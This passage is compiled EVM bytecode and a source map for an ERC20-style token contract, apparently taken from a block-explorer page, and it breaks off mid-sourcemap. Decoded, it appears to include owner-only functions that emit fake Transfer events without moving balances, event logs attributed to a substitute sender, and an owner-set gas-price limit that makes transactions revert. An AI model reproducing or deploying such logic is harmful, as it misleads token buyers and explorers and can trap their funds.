50611469565b505050505050565b611536611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146115c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b990612cf6565b60405180910390fd5b5f1515600760159054906101000a900460ff16151514611617576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160e90612e19565b60405180910390fd5b6001600760156101000a81548160ff021916908315150217905550565b7f00000000000000000000000000000000000000000000d3c21bcecceda100000081565b611660611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146116ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116e390612cf6565b60405180910390fd5b5f5b848490508110156117ab5784848281811061170c5761170b612d14565b5b90506020020160208101906117219190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061178257611781612d14565b5b905060200201356040516117969190612753565b60405180910390a380806001019150506116ee565b505050505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61183d611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146118c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118c090612cf6565b60405180910390fd5b5f5b84849050811015611988578484828181106118e9576118e8612d14565b5b90506020020160208101906118fe9190612a59565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061195f5761195e612d14565b5b905060200201356040516119739190612753565b60405180910390a380806001019150506118cb565b505050505050565b611998611ac3565b73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611a24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1b90612cf6565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611a92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a8990612ea7565b60405180910390fd5b611a9b81612082565b50565b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611b38576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b2f90612f35565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ba6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b9d90612fc3565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611c809190612753565b60405180910390a3505050565b60011515600760149054906101000a900460ff16151514611ce3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cda9061302b565b60405180910390fd5b60011515600760149054906101000a900460ff161515148015611d1857505f1515600760159054906101000a900460ff161515145b15611dd057611d25611093565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480611d905750611d61611093565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b611dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc690613093565b60405180910390fd5b5b5f8190505f73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614158015611e645750611e34611093565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611ea35750611e73611093565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b15612071575f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603611f25577f0000000000000000000000000000000000000000000000000000000000000000905061200b565b60011515600b5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615151480611fce575060011515600b5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161515145b15611fdb575f905061200a565b7f00000000000000000000000000000000000000000000000000000000000000009050612009600a54612143565b5b5b5f81111561206f575f61271061ffff16828561202791906130b1565b612031919061311f565b9050808461203f919061314f565b925061206d8660095f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683612152565b505b505b61207c848483612152565b50505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b803a111561214f575f80fd5b50565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036121c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121b7906131f2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361222e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161222590613280565b60405180910390fd5b61223983838361258a565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156122bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122b49061330e565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461234d9190612c79565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603612433578273ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516124269190612753565b60405180910390a3612579565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036125125760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125059190612753565b60405180910390a3612578565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161256f9190612753565b60405180910390a35b5b61258484848461258f565b50505050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156125cb5780820151818401526020810190506125b0565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6125f082612594565b6125fa818561259e565b935061260a8185602086016125ae565b612613816125d6565b840191505092915050565b5f6020820190508181035f83015261263681846125e6565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61266f82612646565b9050919050565b61267f81612665565b8114612689575f80fd5b50565b5f8135905061269a81612676565b92915050565b5f819050919050565b6126b2816126a0565b81146126bc575f80fd5b50565b5f813590506126cd816126a9565b92915050565b5f80604083850312156126e9576126e861263e565b5b5f6126f68582860161268c565b9250506020612707858286016126bf565b9150509250929050565b5f8115159050919050565b61272581612711565b82525050565b5f60208201905061273e5f83018461271c565b92915050565b61274d816126a0565b82525050565b5f6020820190506127665f830184612744565b92915050565b5f805f606084860312156127835761278261263e565b5b5f6127908682870161268c565b93505060206127a18682870161268c565b92505060406127b2868287016126bf565b9150509250925092565b6127c581612665565b82525050565b5f6020820190506127de5f8301846127bc565b92915050565b5f60ff82169050919050565b6127f9816127e4565b82525050565b5f6020820190506128125f8301846127f0565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261283957612838612818565b5b8235905067ffffffffffffffff8111156128565761285561281c565b5b60208301915083602082028301111561287257612871612820565b5b9250929050565b5f8083601f84011261288e5761288d612818565b5b8235905067ffffffffffffffff8111156128ab576128aa61281c565b5b6020830191508360208202830111156128c7576128c6612820565b5b9250929050565b5f805f805f606086880312156128e7576128e661263e565b5b5f6128f48882890161268c565b955050602086013567ffffffffffffffff81111561291557612914612642565b5b61292188828901612824565b9450945050604086013567ffffffffffffffff81111561294457612943612642565b5b61295088828901612879565b92509250509295509295909350565b5f61ffff82169050919050565b6129758161295f565b82525050565b5f60208201905061298e5f83018461296c565b92915050565b5f805f604084860312156129ab576129aa61263e565b5b5f84013567ffffffffffffffff8111156129c8576129c7612642565b5b6129d486828701612824565b935093505060206129e7868287016126bf565b9150509250925092565b6129fa81612711565b8114612a04575f80fd5b50565b5f81359050612a15816129f1565b92915050565b5f8060408385031215612a3157612a3061263e565b5b5f612a3e8582860161268c565b9250506020612a4f85828601612a07565b9150509250929050565b5f60208284031215612a6e57612a6d61263e565b5b5f612a7b8482850161268c565b91505092915050565b5f60208284031215612a9957612a9861263e565b5b5f612aa6848285016126bf565b91505092915050565b5f8060408385031215612ac557612ac461263e565b5b5f612ad28582860161268c565b9250506020612ae38582860161268c565b9150509250929050565b5f819050919050565b5f612b10612b0b612b0684612646565b612aed565b612646565b9050919050565b5f612b2182612af6565b9050919050565b5f612b3282612b17565b9050919050565b612b4281612b28565b82525050565b5f602082019050612b5b5f830184612b39565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680612ba557607f821691505b602082108103612bb857612bb7612b61565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f612c1860288361259e565b9150612c2382612bbe565b604082019050919050565b5f6020820190508181035f830152612c4581612c0c565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f612c83826126a0565b9150612c8e836126a0565b9250828201905080821115612ca657612ca5612c4c565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f612ce060208361259e565b9150612ceb82612cac565b602082019050919050565b5f6020820190508181035f830152612d0d81612cd4565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f612d9b60258361259e565b9150612da682612d41565b604082019050919050565b5f6020820190508181035f830152612dc881612d8f565b9050919050565b7f436f6e74726163743a2054726164696e67206973206f70656e656421000000005f82015250565b5f612e03601c8361259e565b9150612e0e82612dcf565b602082019050919050565b5f6020820190508181035f830152612e3081612df7565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612e9160268361259e565b9150612e9c82612e37565b604082019050919050565b5f6020820190508181035f830152612ebe81612e85565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f612f1f60248361259e565b9150612f2a82612ec5565b604082019050919050565b5f6020820190508181035f830152612f4c81612f13565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612fad60228361259e565b9150612fb882612f53565b604082019050919050565b5f6020820190508181035f830152612fda81612fa1565b9050919050565b7f436f6e74726163743a206e6f7420696e697469616c697a6564210000000000005f82015250565b5f613015601a8361259e565b915061302082612fe1565b602082019050919050565b5f6020820190508181035f83015261304281613009565b9050919050565b7f436f6e74726163743a2074726164696e67206973206e6f7420737461727465645f82015250565b5f61307d60208361259e565b915061308882613049565b602082019050919050565b5f6020820190508181035f8301526130aa81613071565b9050919050565b5f6130bb826126a0565b91506130c6836126a0565b92508282026130d4816126a0565b915082820484148315176130eb576130ea612c4c565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f613129826126a0565b9150613134836126a0565b925082613144576131436130f2565b5b828204905092915050565b5f613159826126a0565b9150613164836126a0565b925082820390508181111561317c5761317b612c4c565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6131dc60258361259e565b91506131e782613182565b604082019050919050565b5f6020820190508181035f830152613209816131d0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61326a60238361259e565b915061327582613210565b604082019050919050565b5f6020820190508181035f8301526132978161325e565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6132f860268361259e565b91506133038261329e565b604082019050919050565b5f6020820190508181035f830152613325816132ec565b905091905056fea26469706673582212208a25a1ed5668fc9d727a2057dd78b323ceb7b428a7826fa5d8e3258d76fc7df764736f6c63430008180033

Deployed Bytecode Sourcemap

11187:5484:11:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4572:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5677:194;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11405:31;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4893:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5879:529;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11443:29;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11518:71;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11640:36;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4792:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6416:290;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14095:288;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11598:35;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11351:45;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12934:274;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12643:128;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14391:282;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5009:143;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2294:103;;;:::i;:::-;;13216:284;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12479:156;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11724:44;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2072:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4680:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13508:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11302:42;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6714:475;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11479:32;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5160:200;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13802:285;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12779:147;;;:::i;:::-;;11228:67;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14985:282;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5368:176;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14681:296;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2405:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11888:32;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4572:100;4626:13;4659:5;4652:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4572:100;:::o;5677:194::-;5785:4;5802:39;5811:12;:10;:12::i;:::-;5825:7;5834:6;5802:8;:39::i;:::-;5859:4;5852:11;;5677:194;;;;:::o;11405:31::-;;;;;;;;;;;;;:::o;4893:108::-;4954:7;4981:12;;4974:19;;4893:108;:::o;5879:529::-;6019:4;6036:36;6046:6;6054:9;6065:6;6036:9;:36::i;:::-;6085:24;6112:11;:19;6124:6;6112:19;;;;;;;;;;;;;;;:33;6132:12;:10;:12::i;:::-;6112:33;;;;;;;;;;;;;;;;6085:60;;6198:6;6178:16;:26;;6156:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;6308:57;6317:6;6325:12;:10;:12::i;:::-;6358:6;6339:16;:25;6308:8;:57::i;:::-;6396:4;6389:11;;;5879:529;;;;;:::o;11443:29::-;;;;;;;;;;;;;:::o;11518:71::-;;;;;;;;;;;;;:::o;11640:36::-;;;:::o;4792:93::-;4850:5;4875:2;4868:9;;4792:93;:::o;6416:290::-;6529:4;6546:130;6569:12;:10;:12::i;:::-;6596:7;6655:10;6618:11;:25;6630:12;:10;:12::i;:::-;6618:25;;;;;;;;;;;;;;;:34;6644:7;6618:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;6546:8;:130::i;:::-;6694:4;6687:11;;6416:290;;;;:::o;14095:288::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;14261:9:::1;14256:120;14280:8;;:15;;14276:1;:19;14256:120;;;14340:8;;14349:1;14340:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14322:42;;14331:7;14322:42;;;14353:7;;14361:1;14353:10;;;;;;;:::i;:::-;;;;;;;;14322:42;;;;;;:::i;:::-;;;;;;;;14297:3;;;;;;;14256:120;;;;14095:288:::0;;;;;:::o;11598:35::-;;;:::o;11351:45::-;11391:5;11351:45;:::o;12934:274::-;13048:13;13064:12;:10;:12::i;:::-;13048:28;;13092:9;13087:114;13111:10;;:17;;13107:1;:21;13087:114;;;13150:39;13160:5;13167:10;;13178:1;13167:13;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13182:6;13150:9;:39::i;:::-;13130:3;;;;;;;13087:114;;;;13037:171;12934:274;;;:::o;12643:128::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;12753:10:::1;12728:12;:22;12741:8;12728:22;;;;;;;;;;;;;;;;:35;;;;;;;;;;;;;;;;;;12643:128:::0;;:::o;14391:282::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;14551:9:::1;14546:120;14570:8;;:15;;14566:1;:19;14546:120;;;14630:8;;14639:1;14630:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14612:42;;14621:7;14612:42;;;14643:7;;14651:1;14643:10;;;;;;;:::i;:::-;;;;;;;;14612:42;;;;;;:::i;:::-;;;;;;;;14587:3;;;;;;;14546:120;;;;14391:282:::0;;;;;:::o;5009:143::-;5099:7;5126:9;:18;5136:7;5126:18;;;;;;;;;;;;;;;;5119:25;;5009:143;;;:::o;2294:103::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;2359:30:::1;2386:1;2359:18;:30::i;:::-;2294:103::o:0;13216:284::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13378:9:::1;13373:120;13397:8;;:15;;13393:1;:19;13373:120;;;13457:8;;13466:1;13457:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13439:42;;13448:7;13439:42;;;13470:7;;13478:1;13470:10;;;;;;;:::i;:::-;;;;;;;;13439:42;;;;;;:::i;:::-;;;;;;;;13414:3;;;;;;;13373:120;;;;13216:284:::0;;;;;:::o;12479:156::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;12606:21:::1;12583:20;:44;;;;12479:156:::0;:::o;11724:44::-;;;;;;;;;;;;;;;;;;;;;;:::o;2072:87::-;2118:7;2145:6;;;;;;;;;;;2138:13;;2072:87;:::o;4680:104::-;4736:13;4769:7;4762:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4680:104;:::o;13508:286::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13672:9:::1;13667:120;13691:8;;:15;;13687:1;:19;13667:120;;;13751:8;;13760:1;13751:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13733:42;;13742:7;13733:42;;;13764:7;;13772:1;13764:10;;;;;;;:::i;:::-;;;;;;;;13733:42;;;;;;:::i;:::-;;;;;;;;13708:3;;;;;;;13667:120;;;;13508:286:::0;;;;;:::o;11302:42::-;11339:5;11302:42;:::o;6714:475::-;6832:4;6849:24;6876:11;:25;6888:12;:10;:12::i;:::-;6876:25;;;;;;;;;;;;;;;:34;6902:7;6876:34;;;;;;;;;;;;;;;;6849:61;;6963:15;6943:16;:35;;6921:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;7079:67;7088:12;:10;:12::i;:::-;7102:7;7130:15;7111:16;:34;7079:8;:67::i;:::-;7177:4;7170:11;;;6714:475;;;;:::o;11479:32::-;;;;;;;;;;;;;:::o;5160:200::-;5271:4;5288:42;5298:12;:10;:12::i;:::-;5312:9;5323:6;5288:9;:42::i;:::-;5348:4;5341:11;;5160:200;;;;:::o;13802:285::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;13965:9:::1;13960:120;13984:8;;:15;;13980:1;:19;13960:120;;;14044:8;;14053:1;14044:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14026:42;;14035:7;14026:42;;;14057:7;;14065:1;14057:10;;;;;;;:::i;:::-;;;;;;;;14026:42;;;;;;:::i;:::-;;;;;;;;14001:3;;;;;;;13960:120;;;;13802:285:::0;;;;;:::o;12779:147::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;12853:5:::1;12840:18;;:9;;;;;;;;;;;:18;;;12832:59;;;;;;;;;;;;:::i;:::-;;;;;;;;;12914:4;12902:9;;:16;;;;;;;;;;;;;;;;;;12779:147::o:0;11228:67::-;;;:::o;14985:282::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;15145:9:::1;15140:120;15164:8;;:15;;15160:1;:19;15140:120;;;15224:8;;15233:1;15224:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15206:42;;15215:7;15206:42;;;15237:7;;15245:1;15237:10;;;;;;;:::i;:::-;;;;;;;;15206:42;;;;;;:::i;:::-;;;;;;;;15181:3;;;;;;;15140:120;;;;14985:282:::0;;;;;:::o;5368:176::-;5482:7;5509:11;:18;5521:5;5509:18;;;;;;;;;;;;;;;:27;5528:7;5509:27;;;;;;;;;;;;;;;;5502:34;;5368:176;;;;:::o;14681:296::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;14855:9:::1;14850:120;14874:8;;:15;;14870:1;:19;14850:120;;;14934:8;;14943:1;14934:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14916:42;;14925:7;14916:42;;;14947:7;;14955:1;14947:10;;;;;;;:::i;:::-;;;;;;;;14916:42;;;;;;:::i;:::-;;;;;;;;14891:3;;;;;;;14850:120;;;;14681:296:::0;;;;;:::o;2405:238::-;2217:12;:10;:12::i;:::-;2207:22;;:6;;;;;;;;;;:22;;;2199:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;2528:1:::1;2508:22;;:8;:22;;::::0;2486:110:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2607:28;2626:8;2607:18;:28::i;:::-;2405:238:::0;:::o;11888:32::-;;;;;;;;;;;;;:::o;1566:98::-;1619:7;1646:10;1639:17;;1566:98;:::o;9340:380::-;9493:1;9476:19;;:5;:19;;;9468:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9574:1;9555:21;;:7;:21;;;9547:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9658:6;9628:11;:18;9640:5;9628:18;;;;;;;;;;;;;;;:27;9647:7;9628:27;;;;;;;;;;;;;;;:36;;;;9696:7;9680:32;;9689:5;9680:32;;;9705:6;9680:32;;;;;;:::i;:::-;;;;;;;;9340:380;;;:::o;15430:1238::-;15584:4;15569:19;;:11;;;;;;;;;;;:19;;;15561:58;;;;;;;;;;;;:::i;:::-;;;;;;;;;15651:4;15636:19;;:11;;;;;;;;;;;:19;;;:41;;;;;15672:5;15659:18;;:9;;;;;;;;;;;:18;;;15636:41;15632:200;;;15728:7;:5;:7::i;:::-;15720:15;;:4;:15;;;:32;;;;15745:7;:5;:7::i;:::-;15739:13;;:2;:13;;;15720:32;15694:126;;;;;;;;;;;;:::i;:::-;;;;;;;;;15632:200;15844:23;15870:6;15844:32;;15907:1;15891:18;;:4;;;;;;;;;;;:18;;;;:37;;;;;15921:7;:5;:7::i;:::-;15913:15;;:4;:15;;;;15891:37;:54;;;;;15938:7;:5;:7::i;:::-;15932:13;;:2;:13;;;;15891:54;15887:719;;;15962:12;16005:4;;;;;;;;;;;15997:12;;:4;:12;;;15993:353;;16037:6;16030:13;;15993:353;;;16110:4;16088:26;;:12;:18;16101:4;16088:18;;;;;;;;;;;;;;;;;;;;;;;;;:26;;;:54;;;;16138:4;16118:24;;:12;:16;16131:2;16118:16;;;;;;;;;;;;;;;;;;;;;;;;;:24;;;16088:54;16084:247;;;16174:1;16167:8;;16084:247;;;16231:7;16224:14;;16261:50;16290:20;;16261:28;:50::i;:::-;16084:247;15993:353;16371:1;16364:4;:8;16360:235;;;16393:22;11391:5;16418:32;;16428:4;16419:6;:13;;;;:::i;:::-;16418:32;;;;:::i;:::-;16393:57;;16496:14;16487:6;:23;;;;:::i;:::-;16469:41;;16529:50;16545:4;16551:11;;;;;;;;;;;16564:14;16529:15;:50::i;:::-;16374:221;16360:235;15947:659;15887:719;16618:42;16634:4;16640:2;16644:15;16618;:42::i;:::-;15550:1118;15430:1238;;;:::o;2651:191::-;2725:16;2744:6;;;;;;;;;;;2725:25;;2770:8;2761:6;;:17;;;;;;;;;;;;;;;;;;2825:8;2794:40;;2815:8;2794:40;;;;;;;;;;;;2714:128;2651:191;:::o;15275:147::-;15372:6;15358:11;:20;15354:61;;;15395:8;;;15354:61;15275:147;:::o;7197:998::-;7355:1;7337:20;;:6;:20;;;7329:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;7439:1;7418:23;;:9;:23;;;7410:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;7494:47;7515:6;7523:9;7534:6;7494:20;:47::i;:::-;7554:21;7578:9;:17;7588:6;7578:17;;;;;;;;;;;;;;;;7554:41;;7645:6;7628:13;:23;;7606:111;;;;;;;;;;;;:::i;:::-;;;;;;;;;7789:6;7773:13;:22;7753:9;:17;7763:6;7753:17;;;;;;;;;;;;;;;:42;;;;7841:6;7817:9;:20;7827:9